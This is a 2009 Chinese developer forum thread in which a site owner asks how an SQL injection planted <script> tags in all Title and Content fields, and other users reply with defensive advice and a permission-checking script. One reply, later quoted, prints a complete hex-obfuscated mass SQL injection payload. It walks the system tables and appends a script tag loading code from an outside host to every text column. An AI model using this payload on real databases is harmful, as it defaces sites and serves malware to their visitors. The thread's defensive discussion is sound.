这种sql注入方式是如何做到的

lk829 2009-09-02 10:14:48
数据库所有表字段为Title和Content的字段被更新加入了<script></script>
表名都是用的比较繁琐的名字
弱弱的问下 难道不知道表名只知道字段名也可以注入吗 他这是使用的什么方式
...全文
273 31 打赏 收藏 转发到动态 举报
AI 作业
写回复
用AI写文章
31 条回复
切换为时间正序
请发表友善的回复…
发表回复
lk829 2009-09-07
  • 打赏
  • 举报
回复
[Quote=引用 30 楼 le616 的回复:]
dEcLaRe @s vArChAr(8000) sEt @s=dEcLaRe @s vArChAr(8000) sEt @s=0x4445434c415245204054207661726368617228323535292c404320766172636861722832353529204445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420612e6e616d652c622e6e616d652066726f6d207379736f626a6563747320612c737973636f6c756d6e73206220776865726520612e69643d622e696420616e6420612e78747970653d27752720616e642028622e78747970653d3939206f7220622e78747970653d3335206f7220622e78747970653d323331206f7220622e78747970653d31363729204f50454e205461626c655f437572736f72204645544348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c4528404046455443485f5354415455533d302920424547494e20657865632827757064617465205b272b40542b275d20736574205b272b40432b275d3d727472696d28636f6e7665727428766172636861722c5b272b40432b275d29292b2727223e3c736372697074207372633d687474703a2f2f383838392e73732e6c613e3c2f7363726970743e272727294645544348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c4f5345205461626c655f437572736f72204445414c4c4f43415445205461626c655f437572736f72 eXeC(@s)
------------
[/Quote]
----------
你发的这种只不过是cookies注入的的数据
le616 2009-09-07
  • 打赏
  • 举报
回复
dEcLaRe @s vArChAr(8000) sEt @s=dEcLaRe @s vArChAr(8000) sEt @s=0x4445434c415245204054207661726368617228323535292c404320766172636861722832353529204445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420612e6e616d652c622e6e616d652066726f6d207379736f626a6563747320612c737973636f6c756d6e73206220776865726520612e69643d622e696420616e6420612e78747970653d27752720616e642028622e78747970653d3939206f7220622e78747970653d3335206f7220622e78747970653d323331206f7220622e78747970653d31363729204f50454e205461626c655f437572736f72204645544348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c4528404046455443485f5354415455533d302920424547494e20657865632827757064617465205b272b40542b275d20736574205b272b40432b275d3d727472696d28636f6e7665727428766172636861722c5b272b40432b275d29292b2727223e3c736372697074207372633d687474703a2f2f383838392e73732e6c613e3c2f7363726970743e272727294645544348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c4f5345205461626c655f437572736f72204445414c4c4f43415445205461626c655f437572736f72 eXeC(@s)
------------
lk829 2009-09-07
  • 打赏
  • 举报
回复
其实我最想知道的是这种注入方式是如何实现的
估计不是参数注入这么简单
大石谭 2009-09-07
  • 打赏
  • 举报
回复
反正只有有数据输入的地方,都进行检查
当然最好是用存储过程,呵呵,就不用检查
lk829 2009-09-07
  • 打赏
  • 举报
回复
[Quote=引用 26 楼 mngzilin 的回复:]
这是利用js操作cookies的自动回发进行注入的。

[/Quote]
========
mngzilin 能否再告知详细点 说明下原理
mngzilin 2009-09-07
  • 打赏
  • 举报
回复
这是利用js操作cookies的自动回发进行注入的。
lk829 2009-09-07
  • 打赏
  • 举报
回复
[Quote=引用 24 楼 sohighthesky 的回复:]
引用 8 楼 lk829 的回复:
问题是前台所有页面参数字符串都进行了参数过滤(正则)


前台过滤了有用么?

前后台一起过滤,
[/Quote]
------------------
在弱弱的问下 后台必须需要权限才能访问页面 怎么来获取登录权限
sohighthesky 2009-09-05
  • 打赏
  • 举报
回复
[Quote=引用 8 楼 lk829 的回复:]
问题是前台所有页面参数字符串都进行了参数过滤(正则)
[/Quote]

前台过滤了有用么?

前后台一起过滤,
wpfonline 2009-09-05
  • 打赏
  • 举报
回复
关注中 我们公司的网站也老这样
saidong 2009-09-05
  • 打赏
  • 举报
回复
从论坛其他贴子找到的,试后管用。
saidong 2009-09-05
  • 打赏
  • 举报
回复
彻底杜绝SQL注入

1.不要使用sa用户连接数据库
2、新建一个public权限数据库用户,并用这个用户访问数据库
3、[角色]去掉角色public对sysobjects与syscolumns对象的select访问权限
4、[用户]用户名称-> 右键-属性-权限-在sysobjects与syscolumns上面打“×”
5、通过以下代码检测(失败表示权限正确,如能显示出来则表明权限太高):
DECLARE @T varchar(255),
@C varchar(255)
DECLARE Table_Cursor CURSOR FOR
Select a.name,b.name from sysobjects a,syscolumns b
where a.id=b.id and a.xtype= 'u ' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0)
BEGIN print @c
FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor
---------------------------------------------------------------
lk829 2009-09-05
  • 打赏
  • 举报
回复
还有大虾赐教下吗
lk829 2009-09-04
  • 打赏
  • 举报
回复
大家都来关注下
duanjiwei 2009-09-02
  • 打赏
  • 举报
回复
跟踪
zhang17500332 2009-09-02
  • 打赏
  • 举报
回复
在请求的地方加过滤 过滤掉这些关键字
lk829 2009-09-02
  • 打赏
  • 举报
回复
所有表字段为Title和Content的字段被注入 没有的就没有被注入
而且不定期的自动更新注入
我想可能使用的某个工具进行
lk829 2009-09-02
  • 打赏
  • 举报
回复
问题是前台所有页面参数字符串都进行了参数过滤(正则)
zzxap 2009-09-02
  • 打赏
  • 举报
回复
将URL加密一下,想在url注入就不那么容易了
阿彪兄 2009-09-02
  • 打赏
  • 举报
回复
支持一下
沉序员 2009-09-02
  • 打赏
  • 举报
回复
DD
加载更多回复(10)

62,244

社区成员

发帖
与我相关
我的任务
社区描述
.NET技术交流专区
javascript云原生 企业社区
社区管理员
  • ASP.NET
  • .Net开发者社区
  • R小R
加入社区
  • 近7日
  • 近30日
  • 至今
社区公告

.NET 社区是一个围绕开源 .NET 的开放、热情、创新、包容的技术社区。社区致力于为广大 .NET 爱好者提供一个良好的知识共享、协同互助的 .NET 技术交流环境。我们尊重不同意见,支持健康理性的辩论和互动,反对歧视和攻击。

希望和大家一起共同营造一个活跃、友好的社区氛围。

试试用AI创作助手写篇文章吧